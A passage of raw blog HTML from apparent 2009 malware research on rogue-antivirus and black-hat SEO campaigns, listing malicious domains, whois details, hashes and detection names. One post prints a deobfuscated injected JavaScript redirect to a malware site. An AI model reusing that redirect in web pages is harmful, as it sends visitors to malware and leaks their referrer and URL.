src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPNv0F1iZGu5fkcVWVgxSSk_ermXd3oN6Am64t4AR8KSswOT3t4ArJKO_-GOqkb__PBSakF9A7H8KuWAeZ3AMHgyyN9jT-YQdPtDracXDMke_OWGZiTnhRvWKvdwxP0gOYIUgxT68fcPDb/s320/initialsecurityscan.com-SCAM.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320412908331456530" /></a><br /><br />Using NS1.FUCKMONEYCASH.COM and NS2.FUCKMONEYCASH.COM as DNS Servers<br />No whois info - PrivacyProtect.org<br />Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM<br />Dates: Created 01-apr-2009<br />Registration Service Provided By: DOMAIN NAMES REGISTRAR REG.RU LTD.<br /> <br /><br /></p></td></tr></table></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-25378368244379274822009-03-29T23:32:00.000-07:002009-03-29T23:44:58.440-07:00Black Hat SEO and Rogue Antivirus p.3<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="529" height="1516" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td colspan="2" valign="top" height="833"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO and Rogue Antivirus</span><br /><br />AntivirusPlus ZlKon Malware drop - liveinternetmarketingltd.com<br /></p><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus">THIS page</a> if you need more information<br /></td> </tr></table><p>In addition to fake scanner domain, recent research also reveal that several sites are <br />registered through "EVOPLUS LTD" with the information as follow:<br /><br />Registrant:<br />Live Internet Marketing Limited ****@liveinternetmarketingltd.com<br />attn: Private Registrations<br />5285 Decarie Boulevard #100<br />Montreal, QC H3W3C2<br />Canada<br />+1-514-371-5650<br /><br />Domain Name: LIVEINTERNETMARKETINGLTD.COM<br />Registrar: EVOPLUS LTD<br />Whois Server: whois.evonames.com<br />Referral URL: http://www.evonames.com<br />Name Server: NS1.LIVEINTERNETMARKETINGLTD.COM<br />Name Server: NS2.LIVEINTERNETMARKETINGLTD.COM<br />Status: clientDeleteProhibited<br />Status: clientTransferProhibited<br />Status: clientUpdateProhibited<br />Updated Date: 27-mar-2009<br />Creation Date: 20-feb-2009<br />Expiration Date: 20-feb-2010<br /><br />Registered Through:<br />AdvancedHosters.com (http://www.AdvancedHosters.com)<br /><br />******************************<br /><br /> Looking on google show absolutely no web presence apart from malware and pornography websites:<br /><br />For <a href="http://www.google.com/search?hl=en&q="liveinternetmarketingltd"" target="_blank">"liveinternetmarketingltd"</a>: Malware domain drop and pornography websites<br />For <a href="http://www.google.com/search?hl=en&q="Live+Internet+Marketing+Limited"" target="_blank">"Live Internet Marketing Limited"</a>: Pornography websites<br />For <a href="http://www.google.com/search?hl=en&q="liveinternetmarketingltd.com"" target="_blank">"liveinternetmarketingltd.com"</a>: Pornography websites and malware domain found by Malware Domain List.<br /><br />Looking on malwaredomainlist show 23 sites with the registrant information "liveinternetmarketingltd.com".<br /><br />Some domain have been added to the list below:<br /><br />antivirus-plus-new.com<br />antivirusplussite.com<br /> bestinternetexamine.com<br />bestnetcheckonline.com<br />bestwebexamine.com<br />downloadantivirusplus.com<br />easynetcheckonline.com<br />easywebchecklive.com<br />easywebexamine.com<br />easywebscanlive.com<br />internethomecheck.com<br />linkcanlive.com<br />linkcanonline.com<br />linkcanpro.com<br />myantivirusplus.com<br />myinternetexamine.com<br />onlinescanweb.com<br />rapldhsare.com<br />safeyouthnet.com<br />security-check-center.com<br />securesoftinternet.com<br />theantivirusplus.com<br />websecurecheck.com<br />websmartcheck.com<br />websportscheck.com<br />yourinternetexamine.com<br />yournetascertain.com<br />yournetcheckonline.com<br />yournetcheckonline.com<br />yourwebexamine.com<br />yourwebscanlive.com<br />yourwebscanpro.com<br /><br /> **********************<br /><br /> <u>SUSPENDED domain</u><br /><br />Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM<br /><br /><b>antivirusplus.biz</b><br />***<br /><b>antivirusplus2009.net</b><br /><a href="https://safeweb.norton.com/report/show?name=antivirusplus2009.net" target="_blank">Symantec Result</a><br /> Registration Service Provided By: HIGH QUALITY HOST COMPANY<br /> ***<br /><b>avplus2009.com</b><br /><a href="https://safeweb.norton.com/report/show?name=avplus2009.com" target="_blank">Symantec Result</a> <br /> PrivacyProtect - Registration Service Provided By: ERDOMAIN.COM<br /> *** <br /><b>internet-check.net</b><br /> PrivacyProtect - Registration Service Provided By: ERDOMAIN.COM<br />*** <b><br />traffchecking.com</b><br />Registration Service Provided By: ERDOMAIN.COM<br />Registrant: uebochek - Luhansk Oblast,01001 - UA - uebochek@gmail.com<br /><br /><br />********************** </p><p><u>ACTIVE domain</u><br /><br />*** <br /><b>av-plus-support.com</b><br />PrivacyProtect - Registration Service Provided By: ERDOMAIN.COM<br />*** <br /><br />antivirusplussite.com has a fake error page which redirect to downloadantivirusplus.com/buy.php?id=<br /><br />downloadantivirusplus.com is also hosted on the same IP at ZlKon, also registered by "Live Internet Marketing Limited" and the fraudulent payment page is on the domain below:<br /><br />https://secure-plus-payments.com/cgi-bin/nph-pr/pandora/softcore/buy_soft.php?productid=avplus3&advert=<br /><br />209.8.25.204 - ns1.secure-plus-payments.com<br /><br /> Registration Service Provided By: RESELLERCLUB</p> <p>Registrant:<br />Globo inc<br />John Sparck (sparck000@mail.com)<br />South reg, 14 st, 3<br />Atoll<br />,3290867<br />BB<br />Tel. +27.221994</p> <p>"Globo inc" include: antivirus--plus.com, plus-antivirus.com (Already suspended)</p> <p> **********************<br />Looking on <a href="http://www.spamhaus.org/query/bl?ip=94.247.2.215" target="_blank">spamhaus</a> also reveal<br /><br />newp-digital.com <br />webspywareremover2009.com <br />cure-soft.com [63.219.177.210]<br />innovagest2000s.com<br />secure-softwaretools.com [207.226.175.124]<br />**********************<br /><br /><br />Host on 94.247.2.215 [hs.2-215.zlkon.lv] AS12553<br /><br />AS12553 PCEXPRESS-AS "DATORU EXPRESS SERVISS" Ltd.<br /><br />Some screenshot<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjETbUybvpe3XoD1bFdIhLqTcj2RwpnMh-6KJXUbMa3gpR8KwC5s7nyyazulhlLep8MRh8vVx-Zp_s1ACVz74o5empRz1bFjVBnV9qEetpQYKCh_0cMWV92kH5SZyHV5maCpxHeEgdv6il3/s1600-h/yournetascertain.jpg"><img style="cursor:pointer; cursor:hand;width: 318px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjETbUybvpe3XoD1bFdIhLqTcj2RwpnMh-6KJXUbMa3gpR8KwC5s7nyyazulhlLep8MRh8vVx-Zp_s1ACVz74o5empRz1bFjVBnV9qEetpQYKCh_0cMWV92kH5SZyHV5maCpxHeEgdv6il3/s320/yournetascertain.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318786689603306530" /></a><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfYTwDKG-4M59YYown-0lSYDHfTEWvEq2DoqkOgzFlIw7NmEBObrPpZrvrpNw3DGSLgJl02VUHp_urG2xzks7bipGcu_F2uiBPSg27wAygzhNS_bMca6G_k2bZWPfFQx9Fw34pnpfdq2KG/s1600-h/downloadantivirusplus.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 297px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfYTwDKG-4M59YYown-0lSYDHfTEWvEq2DoqkOgzFlIw7NmEBObrPpZrvrpNw3DGSLgJl02VUHp_urG2xzks7bipGcu_F2uiBPSg27wAygzhNS_bMca6G_k2bZWPfFQx9Fw34pnpfdq2KG/s320/downloadantivirusplus.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318786689718896562" /></a><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivSU4vUyvlJseIkmJfgArdaZItmqC2m3UmUfGmpN0OLLhtHHmxqfM5KFi0LlrR_boWC37mj742CYXwQrpH7Inad89IC_Xn2yrQYbPK0QDWehuM8hg8yxUoU5yK0hyphenhyphenhHhyC82KdjHuRLfwQ/s1600-h/bestwebexamine.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 298px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivSU4vUyvlJseIkmJfgArdaZItmqC2m3UmUfGmpN0OLLhtHHmxqfM5KFi0LlrR_boWC37mj742CYXwQrpH7Inad89IC_Xn2yrQYbPK0QDWehuM8hg8yxUoU5yK0hyphenhyphenhHhyC82KdjHuRLfwQ/s320/bestwebexamine.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318786687396297362" /></a><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYP9dZkU0HmIgzwHV-0CyMa4VF3uXUoA1JkOPJ8XhpLBo49D0LwcLe2XmjbU80PGKYp5xha7djTj6iXhaDy_PLKyOahPTn_GJkvGCFy_2a2WufJHRA08LmvE-66SwsR1kt94viSnQ0JiYK/s1600-h/bestinternetexamine.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 246px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYP9dZkU0HmIgzwHV-0CyMa4VF3uXUoA1JkOPJ8XhpLBo49D0LwcLe2XmjbU80PGKYp5xha7djTj6iXhaDy_PLKyOahPTn_GJkvGCFy_2a2WufJHRA08LmvE-66SwsR1kt94viSnQ0JiYK/s320/bestinternetexamine.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318786686945225506" /></a><br />
<br /></p></td></tr><tr><td height="25" colspan="2" valign="top" style="background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Mys96Pf0dtW1L7tKUiFWVVVD1ZmHLx3eZ8LXnpIEUioqMsXimIo-2wzIHbVQoKA5oDFpi1Ho5X-yiMzg8ESOj6iSKcCIdGbzEFyXa2U2q2aPFfq25hseA5fHGQH7RleVNGiNAtOWDFkt/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Analysis:</b></td></tr><tr><td width="16" height="208" valign="top"><br /></td><td width="514"><br /><table width="514" border="0" cellspacing="0" cellpadding="0"><tr><td width="17"> </td><td width="99"><b>File info</b>:</td><td colspan="2">installer_1.exe</td><td width="62"> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>File size</td><td colspan="2">666112 bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td colspan="2">03a1e599d66c64cd11eb5f20d3645767</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>Anubis:</b></td><td colspan="2"><a href="http://anubis.iseclab.org/?action=result&task_id=14a7afddf1abf91e4dda10a549589bfba" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>ThreatExpert</b>:</td><td colspan="2"><a href="http://www.threatexpert.com/report.aspx?md5=03a1e599d66c64cd11eb5f20d3645767" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td colspan="2"><a href="http://www.virustotal.com/analisis/6bd9da2d0000574b72634ea98f9b4245" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>First received</td><td colspan="2">03.27.2009 17:40:50 (CET)</td><td> </td></tr><tr><td> </td><td>Results</td><td colspan="2">17/38 (44.74%)</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td width="225"><span style="color:#FF0000">Trojan.Win32.FakeXPA!IK</span></td><td width="111">a-squared</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">TR/Crypt.XPACK.Gen</span></td><td>Antivir</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">SHeur2.YCE</span></td><td>AVG</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">(Suspicious) - DNAScan</span></td><td>CAT-QuickHeal</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.DownLoad.33473</span></td><td>DrWeb</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan-Downloader.Win32.Delf.swq</span></td><td>F-Secure</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">W32/FakeAV.NW!tr</span></td><td>Fortinet</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.Win32.FakeXPA</span></td><td>Ikarus</td><td> </td></tr><tr><td> </td><td> </td><td width="225"><span style="color:#FF0000">Trojan-Downloader.Win32.Delf.swq</span></td><td>Kaspersky</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Generic Downloader.x</span></td><td>McAfee</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Generic Downloader.x</span></td><td>McAfee</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.Crypt.XPACK.Gen</span></td><td>McAfee-GW-Edition</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">TrojanDownloader:Win32/Renos.BAO</span></td><td>Microsoft</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Suspicious File</span></td><td>Panda</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Troj/FakeAV-NW</span></td><td>Sophos</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.Fakeavalert.B</span></td><td>Sunbelt</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan Horse</span></td><td>Symantec</td><td> </td></tr></table><br />We can see on <a href="http://malware-web-threats.blogspot.com/2009/03/easynetcheckonline-fraudtool-win32.html">this post</a> that the file downloaded two or three days after is updated with a new code.<br /><br /></td></tr><tr><td height="25" colspan="2" valign="top" style="background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Mys96Pf0dtW1L7tKUiFWVVVD1ZmHLx3eZ8LXnpIEUioqMsXimIo-2wzIHbVQoKA5oDFpi1Ho5X-yiMzg8ESOj6iSKcCIdGbzEFyXa2U2q2aPFfq25hseA5fHGQH7RleVNGiNAtOWDFkt/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Result when running:</b></td></tr><tr><td height="200"> </td><td> <br /> HTTP Request: 94.247.2.215 [hs.2-215.zlkon.lv]<br /><br />GET: myantivirusplus.com/install/AntivirusPlus.exe <br />GET: myantivirusplus.com/install/InternetExplorer.dll <br />GET: myantivirusplus.com/cfg/dmns.cfg <br /><br /><br /><table width="370" border="0" cellspacing="0" cellpadding="0"><tr><td width="19"> </td><td width="92"><b>File info</b>:</td><td width="226">AntivirusPlus.exe</td><td width="33"> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td>File size</td><td>1435136 bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td>f0bc697765f31bd431e776387aca2c7f</td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td></td><td colspan="2" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td><b>Anubis</b>:</td><td><a href="http://anubis.iseclab.org/?action=result&task_id=1ce304ec73cca52440dd2b9bf9be6006b" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td><a href="http://www.virustotal.com/analisis/3607f552f5e6f6fe89fdf175095a7e4f" target="_blank">First Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td><a href="http://www.virustotal.com/analisis/3607f552f5e6f6fe89fdf175095a7e4f" target="_blank">Second Report</a></td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td>First received</td><td>03.27.2009 14:17:34 (CET)</td><td> </td></tr><tr><td> </td><td>Results</td><td>Result: 7/39 (17.95%)</td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td>Second time</td><td>03.30.2009 05:23:52 (CET)</td><td> </td></tr><tr><td> </td><td>Results</td><td>Result: 12/39 (30.77%)</td><td> </td></tr><tr><td> </td><td>New info</td><td><a href="http://info.prevx.com/aboutprogramtext.asp?PX5=0F1F76FB00F83E21E6DF158F5C45B4008B59BC51">Prevx</a></td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td><span style="color:#FF0000">Trojan.Win32.FakeXPA!IK</span></td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">FakeAlert</span></td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.Win32.FakeXPA</span></td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan:Win32/FakePlus</span></td><td> </td></tr></table><br /><table width="370" border="0" cellspacing="0" cellpadding="0"><tr><td width="19"> </td><td width="92"><b>File info</b>:</td><td width="226">InternetExplorer.dll</td><td width="33"> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td>File size</td><td>442368 bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td>8e428574cb9e4f680d1e28fe3ca673e8</td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td></td><td colspan="2" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td><a href="http://www.virustotal.com/analisis/33a9dac2323aeac19dc05b98e315344f" target="_blank">First Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td><a href="http://www.virustotal.com/analisis/3573bbf5777a8a912a6affb97fae9f74" target="_blank">Second Report</a></td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td>First received</td><td>03.24.2009 16:12:30 (CET)</td><td> </td></tr><tr><td> </td><td>Results</td><td>Result: 20/39 (51.29%)</td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td>Second time</td><td>03.30.2009 05:23:52 (CET)</td><td> </td></tr><tr><td> </td><td>Results</td><td>Result: 20/39 (51.29%)</td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td><span style="color:#FF0000">Trojan.Win32.FraudPack.ify</span></td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.Win32.FakeAV.iy</span></td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.Win32.FakeXPA</span></td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan:Win32/FakePlus</span></td><td> </td></tr></table><br /><br /></td></tr><tr><td height="25" colspan="2" valign="top" style="background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Mys96Pf0dtW1L7tKUiFWVVVD1ZmHLx3eZ8LXnpIEUioqMsXimIo-2wzIHbVQoKA5oDFpi1Ho5X-yiMzg8ESOj6iSKcCIdGbzEFyXa2U2q2aPFfq25hseA5fHGQH7RleVNGiNAtOWDFkt/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Screenshot:</b></td></tr><tr><td height="200"> </td><td><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3CNgBb2vcFa0I3P4eg8_fq74XoNyT8yM9iqWYaQM51c_L5LqcdrVg8iauhEl7JqnSDcG-V8xkTaIoxZkqR152MFin-fVkQViCx_Arf5vtPhyWkVA4PKPGMl7Tx49Rf_AC7cl2XGJghKkK/s1600-h/AntivirusPlusSetup.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 248px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3CNgBb2vcFa0I3P4eg8_fq74XoNyT8yM9iqWYaQM51c_L5LqcdrVg8iauhEl7JqnSDcG-V8xkTaIoxZkqR152MFin-fVkQViCx_Arf5vtPhyWkVA4PKPGMl7Tx49Rf_AC7cl2XGJghKkK/s320/AntivirusPlusSetup.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318791048360863842" /></a> <br /> <br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSqvI1Nz8ml1QX3O58qgu-eRvWeMQH0b2TIas6MiTDMy_aqJpznE2N27sdHu8zGmcBiZ-ZkCwrzBt-ECQ63P_jM4oHPSsaiVJ1kHMJBAytr0_nBPtM3QJq0thEzPo1y1KB9T3dnUKltkSo/s1600-h/FakeWindowsSecurityCenter-AntivirusPlus.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 241px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSqvI1Nz8ml1QX3O58qgu-eRvWeMQH0b2TIas6MiTDMy_aqJpznE2N27sdHu8zGmcBiZ-ZkCwrzBt-ECQ63P_jM4oHPSsaiVJ1kHMJBAytr0_nBPtM3QJq0thEzPo1y1KB9T3dnUKltkSo/s320/FakeWindowsSecurityCenter-AntivirusPlus.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318825202907174450" /></a></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-88681037223381697742009-03-28T20:15:00.000-07:002009-03-28T20:17:36.878-07:00Black Hat SEO and Rogue Antivirus p.2<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="572" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO and Rogue Antivirus</span><br /><br />The World Wide Web Consortium and Rogue AV<br /></p><table width="546" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="546"><p> <u>Having your website hacked with IFRAME injected, trojans/backdoors?<br /><br />Having your pages infected with redirection to rogue antivirus/antispyware? <br /><br />
Having your pages replaced with World Wide Web Consortium article and some <br />obfuscated javascript code append to them?</u><br /><br />This page will show you some recent research about a malware campaign which has infected thousand of websites. In this campain all of these sites have been used to distribute fake antispyware called WinWebSec or FakeSpyGuard.(Sometimes called WinWebSecurity or SystemSecurity2009 with InternetAntivirusPro)<br /><br />Since July/August 2008 hundreds of thousands of pages on legitimate domains were exploited having web pages stuffed with keywords (porn, celebrities, popular snacks) uploaded to them as a means of attracting victims via search engine results. In some cases, the homepage of the compromised site is being modified, appending hidden links to the malicious web page.<br /> <br />All info concluded that the attack was made via stolen FTP password, on all these domains.<br /><br />An alarming observation also reveal that the activity grows at an exponential rate with malware/exploit code even more sofisticated.<br /><br />You can find some IPs, network, domain used, example of hacked pages/websites and other malicious code injected into these domain on the links below or on other page on this blog.<br /><br /><a href="http://malware-web-threats.blogspot.com/2009/03/web-poisoning-search-engine-ranking.html" title="The silent threat: Black Hat SEO and Rogue Antivirus">The silent threat: Black Hat SEO and Rogue AV - 1</a><br /><a href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="The silent threat: Black Hat SEO and Rogue Antivirus">The silent threat: Black Hat SEO and Rogue AV - 2</a><br /> <br /> *********************<br /> <br />
Screenshot below show tons of websites also used in this rogue av malware campaign but with some World Wide Web W3C pages uploaded with javascript code injected.<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNImnbyC5w-RpFNv7UnXMwRtM3BtcG0YWc_WPLtkMHotT5YLdFj9W9Ehcuw1J0Hssu0TfI-rp6V_eK92V-FEyvc1OBIlhfa9f9eRpwO1ENLAHfr-lAhek7J6heN-VcMkXak2ys4_4azdZT/s1600-h/W3C-hack.jpg"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNImnbyC5w-RpFNv7UnXMwRtM3BtcG0YWc_WPLtkMHotT5YLdFj9W9Ehcuw1J0Hssu0TfI-rp6V_eK92V-FEyvc1OBIlhfa9f9eRpwO1ENLAHfr-lAhek7J6heN-VcMkXak2ys4_4azdZT/s320/W3C-hack.jpg" alt="" width="120" height="400" border="0"id="BLOGGER_PHOTO_ID_5318283110705578354" style="cursor:pointer; cursor:hand;width: 120px; height: 400px;" /></a><br /><br /> Source of on of these site.<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhux3mfhF1D4oV6tQnb3F9zsy-K1LnB44ue_Zcydn6Lx_uBoVwhQyflgaY6PWD-6eqDgOm8puyzi52ZG9czYFQsm-iE22KIb2YoqBOX0KSDCfC9lhdLkkVsxi27zuhey1wn62kZQHT0QgVw/s1600-h/W3C-hack2.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 238px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhux3mfhF1D4oV6tQnb3F9zsy-K1LnB44ue_Zcydn6Lx_uBoVwhQyflgaY6PWD-6eqDgOm8puyzi52ZG9czYFQsm-iE22KIb2YoqBOX0KSDCfC9lhdLkkVsxi27zuhey1wn62kZQHT0QgVw/s320/W3C-hack2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318285628042963618" /></a><br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjKXZe5eOHnojFDeOjeqhk2nb5G3A0oErAH1IupL50x6fwxR5Bqlmz-mbFjk9p8zOVYzrb_TEBTCH6EwUZ9RmFjlYTetsm0ZVDGSC9SwuXwWljhbQMRea8PGPde44uHV4a1V1mDjd_05nz/s1600-h/W3C-hack3.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 194px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjKXZe5eOHnojFDeOjeqhk2nb5G3A0oErAH1IupL50x6fwxR5Bqlmz-mbFjk9p8zOVYzrb_TEBTCH6EwUZ9RmFjlYTetsm0ZVDGSC9SwuXwWljhbQMRea8PGPde44uHV4a1V1mDjd_05nz/s320/W3C-hack3.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318285628576165506" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhux3mfhF1D4oV6tQnb3F9zsy-K1LnB44ue_Zcydn6Lx_uBoVwhQyflgaY6PWD-6eqDgOm8puyzi52ZG9czYFQsm-iE22KIb2YoqBOX0KSDCfC9lhdLkkVsxi27zuhey1wn62kZQHT0QgVw/s1600-h/W3C-hack2.jpg"></a><br /><br />In a browser.<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyODoVZG9ytJxTWVQLaTi6nlrEmRMO3MHhx6P4dQfrmZjbBl5SaegdWrkfZHoE1UST1kHQ66O9oNFxeNqzt6cBFTeWG2OFroCFHsH4-4tfEymPUxj57QdyNPQ4yfwEh5NH6YE9SC9n8fCu/s1600-h/W3C-hack4.jpg"><img style="cursor:pointer; cursor:hand;width: 134px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyODoVZG9ytJxTWVQLaTi6nlrEmRMO3MHhx6P4dQfrmZjbBl5SaegdWrkfZHoE1UST1kHQ66O9oNFxeNqzt6cBFTeWG2OFroCFHsH4-4tfEymPUxj57QdyNPQ4yfwEh5NH6YE9SC9n8fCu/s320/W3C-hack4.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318287622761715586" /></a><br /><br /> Deobfuscation results:<br /><br />window.location = encodeURI(<br />"http://www.onlinedetect.com/in.cgi?7&tsk=aug-task13-r86-id67-t116-hst-16&type=l&seoref=" + <br />encodeURIComponent(document.referrer) + "&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=" + <br />encodeURIComponent(document.URL) + "&default_keyword=XXX");<br /><br />-----------------------<br /><br />The source code also reveal thousand of hacked websites.The analysis of the javascript code redirect to onlinedetect.com or some domain used in this attack. <br />You can find information on <a href="http://malware-web-threats.blogspot.com/2009/03/web-poisoning-search-engine-ranking.html">this page</a>. <br /><br /></p></td></tr></table></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-24808446418048578472009-03-28T20:11:00.000-07:002009-03-28T20:14:29.361-07:00Black Hat SEO - PDF Malware campaign<div style="font-size:10px; 